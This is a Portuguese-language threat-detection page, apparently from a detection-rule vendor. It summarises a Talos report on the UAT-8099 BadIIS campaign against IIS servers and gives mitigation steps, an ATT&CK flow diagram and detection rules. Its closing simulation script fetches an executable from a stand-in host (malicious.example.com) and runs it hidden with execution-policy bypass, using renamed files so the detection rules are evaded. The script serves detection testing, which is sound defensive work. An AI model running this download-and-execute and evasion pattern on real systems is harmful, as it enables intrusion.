Seguir
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
A Cisco Talos relata uma nova campanha UAT-8099 visando servidores IIS vulneráveis na Ásia. O ator implanta variantes personalizadas do BadIIS que incluem identificadores regionais e depende de web shells, PowerShell e da ferramenta de controle remoto GotoHTTP para controle subsequente. A persistência foi ampliada para incluir a criação de contas locais ocultas e o uso de utilitários legítimos de equipes de red teaming para se misturar às atividades administrativas. A técnica se sobrepõe à operação WEBJACK anterior e parece focada em fraudes de SEO afetando sites na Tailândia e no Vietnã.
Investigação
A Talos revisou a telemetria DNS, hashes de arquivos e scripts maliciosos para reconstruir a cadeia de intrusão. Os analistas observaram web shells combinados com ferramentas como SoftEther VPN e EasyTier, além de um conjunto de utilitários sob medida, incluindo Sharp4RemoveLog, CnCrypt Protect, OpenArk64 e GotoHTTP. Duas cepas do BadIIS ajustadas regionalmente — IISHijack e asdSearchEngine — foram analisadas reversamente, expondo códigos de países hard-coded, filtragem de solicitações seletiva e configuração de C2 criptografada com XOR. Um compilado ELF do BadIIS com domínios C2 correspondentes também foi identificado no VirusTotal.
Mitigação
Corrija as vulnerabilidades expostas do IIS, fortaleça a aplicação do firewall de aplicativos web e monitore a criação de contas locais ocultas (por exemplo, admin$, mysql$ e similares). Detecte atividades do PowerShell que baixam ou iniciam o GotoHTTP e bloqueiem a comunicação de saída para domínios C2 conhecidos. Use controles de endpoint para alertar sobre a execução dos utilitários personalizados identificados e sobre modificações inesperadas nos diretórios do servidor web.
Resposta
Se forem encontrados indicadores, isole o servidor, remova os web shells e apague as contas ocultas. Preserve binários do BadIIS e scripts relacionados para análise forense, e realize uma revisão completa do tráfego de rede para identificar atividades C2. Restaure a partir de um backup confiável e reforce a configuração do IIS para prevenir reinfecções.
“graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ffcc99 %% Node definitions action_exploit_public_facing[“<b>Ação</b> – <b>T1190 Exploração de Aplicação Voltada para o Público</b><br/><b>Descrição</b>: Explora vulnerabilidades em aplicações voltadas para a internet para obter acesso inicial.<br/><b>Detalhes</b>: Servidores IIS comprometidos via vulnerabilidades conhecidas e implementaram web shells.”] class action_exploit_public_facing action tool_web_shell[“<b>Ferramenta</b> – <b>Nome</b>: Web Shell<br/><b>Descrição</b>: Script do lado do servidor que permite execução remota de comandos.”] class tool_web_shell tool action_powershell_execution[“<b>Ação</b> – <b>T1059.001 PowerShell</b><br/><b>Descrição</b>: Use o PowerShell para executar comandos e cargas úteis.<br/><b>Comandos</b>: whoami, tasklist, ferramentas de download.”] class action_powershell_execution action tool_powershell[“<b>Ferramenta</b> – <b>Nome</b>: PowerShell<br/><b>Descrição</b>: Shell de linha de comando do Windows e linguagem de script.”] class tool_powershell tool action_system_info_discovery[“<b>Ação</b> – <b>T1082 Descoberta de Informações do Sistema</b><br/><b>Descrição</b>: Reúna informações do sistema operacional e configuração de hardware.<br/><b>Comandos</b>: coleta de informações do sistema, registro de contexto do usuário.”] class action_system_info_discovery action action_create_account[“<b>Ação</b> – <b>T1136 Criar Conta</b><br/><b>Descrição</b>: Crie contas locais ocultas para persistência.”] class action_create_account action action_valid_accounts[“<b>Ação</b> – <b>T1078 Contas Válidas</b><br/><b>Descrição</b>: Use contas criadas para acesso contínuo e elevação de privilégios.”] class action_valid_accounts action action_clear_event_logs[“<b>Ação</b> – <b>T1070.001 Limpar Logs de Eventos do Windows</b><br/><b>Descrição</b>: Remova logs para ocultar atividades.<br/><b>Ferramenta</b>: utilitário Sharp4RemoveLog.”] class action_clear_event_logs action tool_sharp4removelog[“<b>Ferramenta</b> – <b>Nome</b>: Sharp4RemoveLog<br/><b>Descrição</b>: Utilitário para apagar logs de eventos do Windows.”] class tool_sharp4removelog tool action_disable_event_logging[“<b>Ação</b> – <b>T1562.002 Desativar Registro de Eventos do Windows</b><br/><b>Descrição</b>: Enfraquecer defesas desativando registros.”] class action_disable_event_logging action action_obfuscate_files[“<b>Ação</b> – <b>T1027 Arquivos ou Informações Ofuscadas</b><br/><b>Descrição</b>: Use criptografia XOR (chave 0x7A) para ocultar configuração de C2 e modelos HTML.”] class action_obfuscate_files action malware_badiis[“<b>Malware</b> – <b>Nome</b>: BadIIS<br/><b>Descrição</b>: Variantes empregando ofuscação XOR.”] class malware_badiis malware action_lateral_tool_transfer[“<b>Ação</b> – <b>T1570 Transferência de Ferramentas Laterais</b><br/><b>Descrição</b>: Transferir ferramentas e arquivos para o ambiente da vítima.<br/><b>Ferramentas</b>: binários do BadIIS, GotoHTTP, SoftEther VPN, EasyTier.”] class action_lateral_tool_transfer action tool_gotohttp[“<b>Ferramenta</b> – <b>Nome</b>: GotoHTTP<br/><b>Descrição</b>: Transfere arquivos via HTTP/HTTPS.”] class tool_gotohttp tool tool_softether[“<b>Ferramenta</b> – <b>Nome</b>: SoftEther VPN<br/><b>Descrição</b>: Proxy multi-salto para tunelamento de tráfego.”] class tool_softether tool tool_easytier[“<b>Ferramenta</b> – <b>Nome</b>: EasyTier<br/><b>Descrição</b>: Proxy multi-salto para tunelamento de tráfego.”] class tool_easytier tool action_proxy_multi_hop[“<b>Ação</b> – <b>T1090.003 Proxy de Múltiplos Alvos</b><br/><b>Descrição</b>: Use ferramentas proxy para ocultar a origem do tráfego.”] class action_proxy_multi_hop action action_web_protocol_c2[“<b>Ação</b> – <b>T1071.001 Protocolos Web</b><br/><b>Descrição</b>: Comunicação C2 via HTTP/HTTPS usando GotoHTTP.”] class action_web_protocol_c2 action %% Connections showing flow action_exploit_public_facing u002du002d>|utiliza| tool_web_shell tool_web_shell u002du002d>|habilita| action_powershell_execution action_powershell_execution u002du002d>|utiliza| tool_powershell tool_powershell u002du002d>|executa| action_system_info_discovery action_system_info_discovery u002du002d>|leva a| action_create_account action_create_account u002du002d>|habilita| action_valid_accounts action_valid_accounts u002du002d>|utiliza| action_clear_event_logs action_clear_event_logs u002du002d>|utiliza| tool_sharp4removelog action_clear_event_logs u002du002d>|também| action_disable_event_logging action_disable_event_logging u002du002d>|precede| action_obfuscate_files action_obfuscate_files u002du002d>|implementado por| malware_badiis malware_badiis u002du002d>|facilita| action_lateral_tool_transfer action_lateral_tool_transfer u002du002d>|transfere| tool_gotohttp action_lateral_tool_transfer u002du002d>|transfere| tool_softether action_lateral_tool_transfer u002du002d>|transfere| tool_easytier tool_softether u002du002d>|usado para| action_proxy_multi_hop tool_easytier u002du002d>|usado para| action_proxy_multi_hop action_proxy_multi_hop u002du002d>|suporta| action_web_protocol_c2 tool_gotohttp u002du002d>|usado em| action_web_protocol_c2 “
Fluxo de Ataque
Detecções
Download ou Upload via Powershell (via linha de comando)
Ver
Arquivos Suspeitos no Perfil de Usuário Público (via evento_arquivo)
Ver
Possível Enumeração de Contas ou Grupos (via linha de comando)
Ver
Detectar Execução de Comando PowerShell para Implementação de GotoHTTP [Windows Powershell]
Ver
Detecção de Malware BadIIS Alvejando Servidores IIS para Fraude SEO [Servidor Web]
Ver
Execução de Simulação
Pré-requisito: O Check de Preparo de Telemetria e Baseline deve ter passado.
-
Narrativa do Ataque & Comandos:
Um atacante obteve acesso inicial em um servidor web comprometido. Eles criam um diretório oculto chamadobad_iissob o diretório raiz do IIS e colocam um binário web-shell com nome personalizadoshell_xyz.exe(evitando a string literal “web shell”). Usando o shell, eles executam lateralmente uma carga útil do PowerShell que baixa o binário GotoHTTP, renomeia-o parasvc_update.exe, e o executa. Como os nomes das imagens estão obfuscados, as verificaçõesImage|containsda regra original são contornadas, enquanto a linha de comando ainda contém “PowerShell”. -
Script de Teste de Regressão: Este script reproduz os passos descritos e gera telemetria semelhante ao ataque BadIIS sem usar as strings exatas que a regra observa.
# Simulação BadIIS – versão ofuscada $webRoot = "C:inetpubwwwroot" $payloadDir = Join-Path $webRoot "bad_iis" New-Item -Path $payloadDir -ItemType Directory -Force | Out-Null # Implantar um web-shell renomeado (cópia binária de um exe benigno conhecido) $shellSrc = "$env:SystemRootSystem32notepad.exe" $shellDst = Join-Path $payloadDir "shell_xyz.exe" Copy-Item -Path $shellSrc -Destination $shellDst -Force # Simular o web-shell invocando PowerShell para baixar GotoHTTP $gotoUrl = "http://malicious.example.com/GotoHTTP.exe" $gotoDst = "C:WindowsTempsvc_update.exe" $psCommand = @" Invoke-WebRequest -Uri '$gotoUrl' -OutFile '$gotoDst'; Start-Process -FilePath '$gotoDst' -WindowStyle Hidden; "@ # Executar a carga útil do PowerShell através do web-shell renomeado (criação de processo) Start-Process -FilePath $shellDst -ArgumentList "/c powershell.exe -NoProfile -ExecutionPolicy Bypass -Command `$psCommand`" -WindowStyle Hidden Write-Output "Simulação BadIIS executada." -
Comandos de Limpeza: Remove os artefatos plantados e restaura o ambiente.
# Limpar artefatos da simulação BadIIS $webRoot = "C:inetpubwwwroot" $payloadDir = Join-Path $webRoot "bad_iis" Remove-Item -Path $payloadDir -Recurse -Force -ErrorAction SilentlyContinue $gotoDst = "C:WindowsTempsvc_update.exe" Remove-Item -Path $gotoDst -Force -ErrorAction SilentlyContinue Write-Output "Limpeza concluída."